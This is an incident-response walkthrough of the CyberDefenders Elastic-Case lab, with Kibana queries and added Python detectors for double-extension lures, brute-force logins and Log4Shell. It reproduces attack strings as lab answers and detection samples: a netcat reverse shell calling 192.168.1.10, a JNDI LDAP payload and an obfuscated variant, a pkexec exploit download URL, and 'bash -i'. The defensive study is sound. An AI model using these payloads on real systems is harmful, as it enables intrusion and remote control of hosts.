Good day. Today we have a walkthrough of the Elastic-Case lab built on the ELK stack, Category: Incident response - https://cyberdefenders.org/blueteam-ctf-challenges/90#nav-questions
To find the relevant events we will use KQL (Kibana Query Language), which is typed into the empty search bar at the top, and the filter bar just below it, where each active filter shows as a tile. The "EQL:" lines in this writeup are those filter tiles, written as field: value (or field: exists). Note that Elastic's own EQL is the Event Query Language, a separate sequence-query language; the tiles below the search bar are ordinary Kibana field filters.
1. Who downloads the malicious file which has a double extension?
KQL: *.*.*
EQL: file.name: exists
Answer: ahmed
2. What is the hostname he was using?
KQL: *.*.*
EQL: file.name: exists
Answer: DESKTOP-Q1SL9P2
3. What is the name of the malicious file?
KQL: *.*.*
EQL: file.name: exists
Answer: Acount_details.pdf.exe
4. What is the attacker's IP address?
EQL: process.name: Acount_details.pdf.exe, source.ip: exists
Answer: 192.168.1.10
5. Another user with high privilege runs the same malicious file. What is the username?
EQL: process.name: Acount_details.pdf.exe, source.ip: exists, not user.name: ahmed
Answer: Cybery
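Questions 1-5 are a single pivot: find the double-extension lure, then who touched it, on which host, and where it phoned home. The following is an added example (my code, not from the lab or from Elastic) that does the same pivot in Python over ECS-style JSON events. The field names are ECS; the event records are constructed here and only echo the lab's answers (user, host, file and IP values), with no port or path data that the page does not give.

```python
"""Double-extension lure hunt over ECS-style events (Q1-Q5).

Added example; not code from the CyberDefenders lab or from Elastic. The
events below are constructed JSON lines with ECS field names; the values
echo the lab's answers but the records themselves are made up here.
"""
import json
import re

# Extensions Windows will execute. A document-looking extension in front of
# one of these is the lure: "Acount_details.pdf.exe" displays as a PDF when
# Explorer hides extensions for known file types.
EXECUTABLE_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "hta", "msi", "ps1"}
LURE_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "jpg", "png", "txt"}
DOUBLE_EXT = re.compile(r"\.(?P<lure>[a-z0-9]{1,5})\.(?P<real>[a-z0-9]{1,4})$", re.I)

# Constructed sample events, one JSON document per line.
SAMPLE_EVENTS = """\
{"event":{"category":"file","action":"creation"},"file":{"name":"Acount_details.pdf.exe"},"user":{"name":"ahmed"},"host":{"name":"DESKTOP-Q1SL9P2"}}
{"event":{"category":"file","action":"creation"},"file":{"name":"report.final.pdf"},"user":{"name":"ahmed"},"host":{"name":"DESKTOP-Q1SL9P2"}}
{"event":{"category":"process","action":"start"},"process":{"name":"Acount_details.pdf.exe","pid":4120},"user":{"name":"ahmed"},"host":{"name":"DESKTOP-Q1SL9P2"}}
{"event":{"category":"network","action":"connection_attempted"},"process":{"name":"Acount_details.pdf.exe","pid":4120},"source":{"ip":"192.168.10.10"},"destination":{"ip":"192.168.1.10"},"user":{"name":"ahmed"},"host":{"name":"DESKTOP-Q1SL9P2"}}
{"event":{"category":"process","action":"start"},"process":{"name":"Acount_details.pdf.exe","pid":5220},"user":{"name":"Cybery"},"host":{"name":"DESKTOP-Q1SL9P2"}}
{"event":{"category":"network","action":"connection_attempted"},"process":{"name":"Acount_details.pdf.exe","pid":5220},"source":{"ip":"192.168.10.10"},"destination":{"ip":"192.168.1.10"},"user":{"name":"Cybery"},"host":{"name":"DESKTOP-Q1SL9P2"}}
{"event":{"category":"process","action":"start"},"process":{"name":"explorer.exe","pid":900},"user":{"name":"ahmed"},"host":{"name":"DESKTOP-Q1SL9P2"}}
"""


def is_double_extension(name: str) -> bool:
    """True for 'lure.ext' where the last extension executes (pdf.exe, jpg.scr ...).
    'report.final.pdf' and 'setup.exe' are not flagged."""
    m = DOUBLE_EXT.search(name)
    return bool(m) and m["lure"].lower() in LURE_EXT and m["real"].lower() in EXECUTABLE_EXT


def load_events(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def get(ev: dict, path: str):
    """Walk a dotted ECS path such as 'process.name'; None if absent."""
    cur = ev
    for part in path.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def find_lures(events: list) -> list:
    """Q1-Q3: file events whose name is a document-looking executable,
    with the user and host that wrote the file."""
    return [{"file": get(ev, "file.name"), "user": get(ev, "user.name"), "host": get(ev, "host.name")}
            for ev in events
            if get(ev, "file.name") and is_double_extension(get(ev, "file.name"))]


def executions(events: list, file_name: str) -> list:
    """Q5: every user that started the lure as a process (not only the downloader)."""
    return sorted({get(ev, "user.name") for ev in events
                   if get(ev, "event.category") == "process" and get(ev, "process.name") == file_name})


def remote_peers(events: list, file_name: str) -> list:
    """Q4: remote ends of connections made by the lure; the non-LAN one is the attacker."""
    return sorted({get(ev, "destination.ip") for ev in events
                   if get(ev, "event.category") == "network" and get(ev, "process.name") == file_name})


if __name__ == "__main__":
    evs = load_events(SAMPLE_EVENTS)
    print("lures:", find_lures(evs))
    print("run by:", executions(evs, "Acount_details.pdf.exe"))
    print("peers:", remote_peers(evs, "Acount_details.pdf.exe"))
```

The page's `*.*.*` KQL search matches anything with two dots, including harmless names like `report.final.pdf`; the regex above narrows that to a document extension followed by an executable one, which is the pattern worth alerting on. For the attacker's address, look at the remote end of the connection (destination.ip for an outbound callback) rather than only filtering on source.ip: exists.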
6. The attacker was able to upload a DLL file of size 8704. What is the file name?
KQL: *.dll
EQL: file.size: exists, file.size: 8704
Answer: mCblHDgWP.dll
7. What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?
KQL: 10716
Answer: rundll32.exe
8. The previous process was able to access a registry. What is the full path of the registry?
EQL: process.name: rundll32.exe, registry.path: exists
Answer: HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
9. PowerShell process with pid 8836 changed a file in the system. What was that filename?
EQL: process.name: powershell.exe, file.path: exists, process.pid: 8836, event.action: overwrite
Answer: ModuleAnalysisCache
10. PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?
EQL: process.name: powershell.exe, process.pid: 11676, event.action: creation
Answer: __PSScriptPolicyTest_bymwxuft.3b5.ps1
11. What is the IP address of the machine that is in the same LAN as the Windows machine?
KQL: 192.168.10.10
EQL: host.os: windows, host.os.platform: windows
Answer: 192.168.10.30
12. The attacker logs in to the Ubuntu machine after a brute-force attack. What is the username he successfully logged in with?
KQL: ubuntu and login
EQL: event.type: start, event.type: authentication_success
Answer: Salem
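The filter above only surfaces the successful login; what makes it a brute-force foothold is the burst of failures from the same source just before it. The following added example (my code, not from the lab or from Elastic's prebuilt rules) does that correlation in Python over constructed ECS-style authentication events with flattened field names (`@timestamp`, `host.name`, `source.ip`, `user.name`, `event.outcome`). The threshold and window are assumptions; the timestamps and the usernames tried are made up, only the hostname, source address and the final username echo the page.

```python
"""Brute-force-then-success correlation over ECS authentication events (Q12).

Added example; not part of the lab or of Elastic's prebuilt rules. The events
are constructed: a burst of failed logins from one source, then a success for
a different username from the same source. Keys are flattened ECS names.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def _auth(ts, src, user, outcome, host="ubuntu"):
    return {"@timestamp": ts, "host.name": host, "source.ip": src,
            "user.name": user, "event.category": "authentication",
            "event.outcome": outcome}


SAMPLE_AUTH = (
    # six failed guesses in nine seconds from the attacker's address (constructed)
    [_auth(f"2022-01-20T10:00:{i:02d}Z", "192.168.1.10", u, "failure")
     for i, u in enumerate(["root", "admin", "ubuntu", "salem", "oracle", "test"])]
    + [_auth("2022-01-20T10:00:09Z", "192.168.1.10", "Salem", "success")]
    # one mistyped password from a LAN host is not a brute force
    + [_auth("2022-01-20T10:05:00Z", "192.168.10.30", "Salem", "failure"),
       _auth("2022-01-20T10:05:07Z", "192.168.10.30", "Salem", "success")]
)


def brute_force_logins(events, threshold=5, window=timedelta(minutes=10)):
    """A success whose (host, source) pair accumulated at least `threshold`
    failures inside `window` is the attacker's foothold. Returns one record
    per such success, in time order, with the username that finally worked."""
    failures = defaultdict(list)          # (host, source ip) -> failure times
    hits = []
    for ev in sorted(events, key=lambda e: e["@timestamp"]):
        if ev.get("event.category") != "authentication":
            continue
        t = datetime.strptime(ev["@timestamp"], "%Y-%m-%dT%H:%M:%SZ")
        key = (ev["host.name"], ev["source.ip"])
        if ev["event.outcome"] == "failure":
            failures[key].append(t)
        elif ev["event.outcome"] == "success":
            recent = [f for f in failures[key] if t - f <= window]
            if len(recent) >= threshold:
                hits.append({"host": key[0], "source_ip": key[1],
                             "user": ev["user.name"], "failures": len(recent),
                             "first_failure": min(recent).isoformat()})
    return hits


if __name__ == "__main__":
    for hit in brute_force_logins(SAMPLE_AUTH):
        print(hit)
```

Keying on (host, source ip) rather than on username is deliberate: a password-spraying attacker rotates usernames, so the count per username never reaches the threshold while the count per source does.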
13. After that, the attacker downloaded the exploit from a GitHub repo using wget. What is the full URL of the repo?
KQL: wget
EQL: process.args: exists
Answer: https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py
14. After the attacker runs the exploit, which spawns a new process called pkexec, what is the process's md5 hash?
EQL: process.name: pkexec, process.hash.md5: exists
Answer: 3a4ad518e9e404a6bad3d39dfebaf2f6
15. Then the attacker gets an interactive shell by running a specific command from process id 3011 as the root user. What is the command?
EQL: process.command_line: exists, user.name: root, process.parent.pid: 3011
Answer: bash -i
16. What is the hostname which alert signal.rule.name: "Netcat Network Activity"?
Since the field signal.rule.name is not in the index pattern, open Security -> Alerts in the side panel instead.
Answer: CentOS
17. What is the username who ran netcat?
Answer: solr
18. What is the parent process name of netcat?
KQL: nc
Answer: Java
19. If you focus on the nc process, you can get the entire command the attacker ran to get a reverse shell. Write the full command.
KQL: nc
Answer: nc -e /bin/bash 192.168.1.10 9999
20. From the previous three questions, you may remember a famous java vulnerability. What is it?
You may remember that this is the Log4Shell vulnerability, or you can simply google it. Yes, that works too.
Answer: Log4Shell
21. What is the entire log file path of the "solr" application?
KQL: solr
EQL: user.name: solr, file.path: exists
Answer: /var/solr/logs/solr.log
22. What is the path that is vulnerable to log4j?
KQL: *jndi*
Answer: /admin/cores
23. What is the GET request parameter used to deliver log4j payload?
Answer: foo
24. What is the JNDI payload that is connected to the LDAP port?
Answer: {foo=${jndi:ldap://192.168.1.10:1389/Exploit}}
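Questions 16-19 and 22-24 are the two halves of one Log4Shell chain: the JNDI lookup arrives in a request parameter and is written into the Solr log, and the resulting Java child process launches netcat with `-e`. The following added example (my code, not from the lab, Apache Solr or Log4j) extracts the vulnerable path, parameter and JNDI payload from request-log lines, and parses netcat command lines into shell binary and remote endpoint so the `nc` alert can be tied back to its `java` parent. The log lines and process events are constructed here in the shape the page shows (`path=... params={...} status=`, and flattened ECS `process.command_line` / `process.parent.name`); the `${lower:}`, `${upper:}` and `${x:-y}` unwrapping goes beyond what the page shows and is an assumption about attacker obfuscation, as is the third, URL-encoded log line.

```python
"""Log4Shell triage: JNDI lookups in Solr request-log lines (Q22-Q24) and
netcat reverse-shell command lines (Q16-Q19).

Added example; not code from the CyberDefenders lab, Apache Solr or Log4j.
The log lines and process events below are constructed to match the shapes
seen in the lab.
"""
import re
import shlex
from urllib.parse import unquote

# A Solr request-log line carries the servlet path and the query params in
# braces; the JNDI lookup hides inside one of the param values.
LINE_RE = re.compile(r"path=(?P<path>\S+)\s+params=\{(?P<params>.*?)\}\s+status=")
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}]+)(?::(?P<port>\d+))?(?P<path>/[^}]*)?\}",
    re.I,
)
# Assumption beyond the page: attackers wrap 'jndi' in ${lower:..}, ${upper:..}
# or the ${x:-y} default trick; unwrap those before matching.
OBF_RE = re.compile(r"\$\{(?:(?:lower|upper):([^}]*)|[^}]*?:-([^}]*))\}", re.I)

SAMPLE_SOLR_LOG = """\
2021-12-20 10:11:02.133 INFO  (qtp1-20) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${jndi:ldap://192.168.1.10:1389/Exploit}} status=0 QTime=2
2021-12-20 10:11:05.501 INFO  (qtp1-21) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={action=STATUS&wt=json} status=0 QTime=1
2021-12-20 10:12:40.004 INFO  (qtp1-22) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F192.168.1.10%3A1389%2FExploit%7D} status=0 QTime=3
"""

SAMPLE_PROCESSES = [  # constructed ECS-style process events, flattened keys
    {"host.name": "CentOS", "user.name": "solr", "process.parent.name": "java",
     "process.command_line": "nc -e /bin/bash 192.168.1.10 9999"},
    {"host.name": "CentOS", "user.name": "admin", "process.parent.name": "bash",
     "process.command_line": "nc -zv 192.168.10.30 22"},
]


def normalize(value: str) -> str:
    """Strip nested lookup obfuscation until the string stops changing."""
    prev = None
    while prev != value:
        prev = value
        value = OBF_RE.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), value)
    return value


def find_jndi(log_text: str) -> list:
    """One record per JNDI lookup found in a request param value."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        for kv in m["params"].split("&"):
            key, _, value = kv.partition("=")
            j = JNDI_RE.search(normalize(unquote(value)))
            if j:
                hits.append({"path": m["path"], "param": key,
                             "scheme": j["scheme"].lower(), "host": j["host"],
                             "port": int(j["port"]) if j["port"] else None,
                             "payload": j.group(0), "params": "{" + m["params"] + "}"})
    return hits


NETCATS = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}


def parse_nc_shell(command_line: str):
    """Shell binary and remote endpoint from an 'nc -e'/'-c' command line.
    None for netcat used without -e/-c (listener, port scan, file copy)."""
    try:
        argv = shlex.split(command_line)
    except ValueError:
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCATS:
        return None
    shell = None
    for i, arg in enumerate(argv):
        if arg in ("-e", "-c") and i + 1 < len(argv):
            shell = argv[i + 1]
    if shell is None or len(argv) < 3 or not argv[-1].isdigit():
        return None
    return {"shell": shell, "remote_host": argv[-2], "remote_port": int(argv[-1])}


def reverse_shell_alerts(process_events: list) -> list:
    """Flag nc reverse shells and keep the parent: a 'java' parent on the
    Solr host is the Log4Shell tell."""
    alerts = []
    for ev in process_events:
        info = parse_nc_shell(ev.get("process.command_line", ""))
        if info:
            alerts.append({"host": ev.get("host.name"), "user": ev.get("user.name"),
                           "parent": ev.get("process.parent.name"), **info})
    return alerts


if __name__ == "__main__":
    for hit in find_jndi(SAMPLE_SOLR_LOG):
        print("jndi:", hit)
    for alert in reverse_shell_alerts(SAMPLE_PROCESSES):
        print("revshell:", alert)
```

Decoding and unwrapping before matching is the part that a plain `*jndi*` KQL search misses: the third constructed line contains neither the literal `jndi` nor `${` until it is URL-decoded and the `${lower:j}` wrapper removed. Matching the netcat command on the `-e`/`-c` flag rather than on the process name alone keeps ordinary `nc -zv` port checks out of the alert.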